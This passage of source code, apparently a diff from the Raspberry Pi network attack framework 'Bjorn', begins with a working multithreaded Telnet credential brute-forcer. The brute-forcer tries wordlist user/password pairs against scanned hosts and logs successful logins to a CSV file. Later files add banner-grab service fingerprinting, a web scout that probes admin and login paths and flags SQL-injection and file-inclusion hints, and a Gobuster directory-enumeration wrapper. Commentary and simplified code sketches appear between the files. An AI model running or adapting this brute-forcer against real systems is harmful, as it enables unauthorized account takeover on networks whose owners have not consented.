def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Indices 2 and 3 in the expect list are the "$ " / "# " shell prompts,
# i.e. we reached a shell and the login succeeded
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass  # Any failure (refused connection, timeout, protocol error) counts as a failed attempt
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
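The worker/queue pattern used by TelnetConnector (fill a `Queue` with credential pairs, let N threads drain it, collect hits under a lock) can be reduced to a standalone sketch. One subtlety: the original worker checks `queue.empty()` before a blocking `get()`, which can race when several threads drain the last items; `get_nowait()` sidesteps that. `try_login` and the credential list below are illustrative stand-ins, not Bjorn APIs.

```python
import threading
from queue import Queue, Empty

def bruteforce(candidates, try_login, num_threads=4):
    """Queue/worker fan-out, as in TelnetConnector.run_bruteforce().

    try_login(user, password) -> bool stands in for the real
    telnet_connect(); names here are illustrative only.
    """
    q = Queue()
    for cred in candidates:
        q.put(cred)
    results = []
    lock = threading.Lock()

    def worker():
        while True:
            try:
                user, password = q.get_nowait()
            except Empty:
                return  # queue drained, thread exits
            if try_login(user, password):
                with lock:  # guard the shared results list
                    results.append((user, password))
            q.task_done()

    threads = [threading.Thread(target=worker) for _ in range(num_threads)]
    for t in threads:
        t.start()
    q.join()  # block until every queued credential was processed
    for t in threads:
        t.join()
    return results
```

With a fake `try_login` that only accepts `("admin", "admin")`, `bruteforce` returns exactly that pair; the thread count only changes throughput, not the result.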

191
actions/thor_hammer.py Normal file
View File

@@ -0,0 +1,191 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import logging
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
class ThorHammer:
def __init__(self, shared_data):
self.shared_data = shared_data
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Persist to DB if method exists.
try:
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
progress.advance(1)
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))
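The connect-and-banner logic in `_connect_and_banner()` can be exercised standalone. This sketch keeps the same shape (a `connect_ex` probe, a bounded `recv`, decoding with `errors="ignore"`); banner-less services such as HTTP simply stay silent until the recv times out and an empty banner is returned. The function name and defaults are illustrative, not part of ThorHammer.

```python
import socket
import threading

def grab_banner(ip, port, timeout_s=1.5, max_bytes=1024):
    """Fast TCP connect + banner grab. Returns (is_open, banner).

    Sketch only: IPv4, no retries; many services (SSH, FTP, SMTP)
    speak first, so a single recv is usually enough.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout_s)
    try:
        if s.connect_ex((ip, int(port))) != 0:
            return False, ""  # closed or filtered
        try:
            data = s.recv(max_bytes)
        except Exception:
            data = b""  # silent service: open, but no banner
        return True, data.decode("utf-8", errors="ignore").strip()
    finally:
        s.close()
```

Against a local socket that greets with an SSH-style banner, the helper reports the port open and returns the banner text; against a closed port it returns `(False, "")`.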

396
actions/valkyrie_scout.py Normal file
View File

@@ -0,0 +1,396 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()  # LAN targets commonly use self-signed certs
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
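The core of `_detect_signals()`, classifying the HTTP auth scheme from `WWW-Authenticate` and spotting password forms in the body, can be condensed into a small testable helper. This is a simplified rewrite of the heuristics above for illustration, not a drop-in replacement.

```python
def detect_login_surface(status, headers, body):
    """Condensed heuristics from _detect_signals(): HTTP auth scheme
    on 401 responses, plus a cheap password-form check on the body."""
    h = {str(k).lower(): str(v) for k, v in headers.items()}
    www = h.get("www-authenticate", "").lower()
    auth_type = None
    if status == 401 and "basic" in www:
        auth_type = "basic"
    elif status == 401 and "digest" in www:
        auth_type = "digest"
    snippet = body.lower()
    # A login form needs both a <form> tag and a password input.
    has_login_form = "<form" in snippet and (
        'type="password"' in snippet or "type='password'" in snippet
    )
    return {"auth_type": auth_type, "has_login_form": has_login_form}
```

A page with a password form yields `has_login_form=True`; a 401 with `WWW-Authenticate: Basic` yields `auth_type="basic"`; plain content yields neither.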

424
actions/web_enum.py Normal file
View File

@@ -0,0 +1,424 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Dynamic HTTP status filtering via shared_data.web_status_codes.
"""
import re
import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
# Regex to capture Gobuster's progress output on stderr
# e.g.: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]:
"""
Expand a UI-level policy into a set of integer HTTP status codes.
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache the wordlist size (used to compute the progress %)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
self._available = True
if not os.path.exists(self.gobuster_path):
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Policy coming from the UI: create it if missing
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Count the wordlist lines once, to compute the progress %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Fast buffered read
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recomputed on every run so live UI updates are reflected."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# Clean the line (strip ANSI escapes and control characters)
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# Check for progress output
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# Check for findings (standard Gobuster result line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"):
path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
